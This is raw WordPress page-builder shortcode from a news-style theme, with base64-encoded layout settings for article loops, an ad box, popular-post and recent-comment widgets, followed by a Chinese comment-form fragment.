tdc_css=”eyJsYW5kc2NhcGUiOnsibWFyZ2luLXJpZ2h0IjoiLTIyIiwibWFyZ2luLWxlZnQiOiItMjIiLCJ3aWR0aCI6ImF1dG8iLCJkaXNwbGF5IjoiYmxvY2sifSwibGFuZHNjYXBlX21heF93aWR0aCI6MTE0MCwibGFuZHNjYXBlX21pbl93aWR0aCI6MTAxOSwicG9ydHJhaXQiOnsibWFyZ2luLXJpZ2h0IjoiLTE0IiwibWFyZ2luLWxlZnQiOiItMTQiLCJ3aWR0aCI6ImF1dG8iLCJkaXNwbGF5IjoiYmxvY2sifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OH0=” art_title=”eyJhbGwiOiI4cHggMCIsInBvcnRyYWl0IjoiNHB4IDAifQ==” meta_padding=”eyJhbGwiOiIxMHB4IDIwcHggMjJweCIsInBvcnRyYWl0IjoiMnB4IDEwcHggMTZweCJ9″ modules_gap=”eyJhbGwiOiI0IiwicG9ydHJhaXQiOiIyIn0=” video_icon_pos=”corner” video_icon=”30″][td_block_ad_box tdc_css=”eyJhbGwiOnsiZGlzcGxheSI6IiJ9fQ==” spot_id=”” spot_img_all=”18″ spot_img_horiz=”content-horiz-center” spot_title=”Advertisment” spot_img_mob=”19″ spot_img_width=”eyJwaG9uZSI6IjMwMCJ9″ spot_img_all_width_attribute=”728″ spot_img_all_height_attribute=”90″ spot_img_mob_width_attribute=”300″ spot_img_mob_height_attribute=”250″ spot_url=”https://www.google.com” spot_img_alt_attribute=”Google search engine”][/vc_column][/vc_row][vc_row tdc_css=”eyJhbGwiOnsibWFyZ2luLXRvcCI6IjQ4IiwiZGlzcGxheSI6IiJ9fQ==”][vc_column width=”2/3″][tdb_loop_2 art_title_pos=”bottom” info_pos=”bottom” art_excerpt_pos=”bottom” modules_category=”image” btn_pos=”bottom” modules_on_row=”eyJhbGwiOiI1MCUiLCJwaG9uZSI6IjEwMCUifQ==” image_alignment=”0″ show_excerpt=”none” show_btn=”none” custom_title=”LATEST ARTICLES” ajax_pagination=”numbered” f_header_font_transform=”” show_audio=”none” art_audio_pos=”bottom” art_audio_size=”0″ f_title_font_size=”eyJwb3J0cmFpdCI6IjE3In0=” f_title_font_line_height=”eyJwb3J0cmFpdCI6IjIycHgifQ==” modules_gap=”eyJwb3J0cmFpdCI6IjIwIn0=” all_modules_space=”eyJhbGwiOiIzNiIsInBvcnRyYWl0IjoiMzAifQ==” pag_space=”eyJwaG9uZSI6IjIwIn0=” image_size=”td_485x360″][/vc_column][vc_column width=”1/3″ el_class=”” is_sticky=”yes”][td_flex_block_1 modules_on_row=”eyJwb3J0cmFpdCI6IjEwMCUiLCJwaG9uZSI6IjEwMCUifQ==” image_size=”td_218x150″ image_floated=”float_left” image_width=”30″ image_height=”70″ show_btn=”none” show_excerpt=”none” show_com=”none” show_author=”none” show_cat=”none” limit=”4″ meta_padding=”eyJhbGwiOiIwIDAgMCAxNnB4IiwicG9ydHJhaXQiOiIwIDAgMCAxM3B4In0=” f_title_font_size=”eyJhbGwiOiIxNCIsInBvcnRyYWl0IjoiMTIifQ==” f_title_font_line_height=”1.4″ f_title_font_weight=”500″ all_modules_space=”eyJwb3J0cmFpdCI6IjIwIiwicGhvbmUiOiIyNiIsImFsbCI6IjI2In0=” category_id=”” modules_gap=”eyJwb3J0cmFpdCI6IjIwIn0=” show_date=”” custom_title=”Most Popular” ajax_pagination=”load_more” sort=”” f_header_font_transform=”uppercase” video_icon=”24″][vc_wp_recentcomments custom_title=”Recent Comments” com_divider=”” f_auth_font_family=”” f_link_font_weight=”” f_link_font_family=”” f_title_font_family=”” f_header_font_transform=”uppercase” com_margin=”0″ com_padding=”0 0 15px” f_title_font_size=”eyJwb3J0cmFpdCI6IjEyIn0=” f_auth_font_size=”eyJwb3J0cmFpdCI6IjExIn0=” f_link_font_size=”eyJwb3J0cmFpdCI6IjEyIn0=” number=”5″][/vc_column][/vc_row][/tdc_zone]

 

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址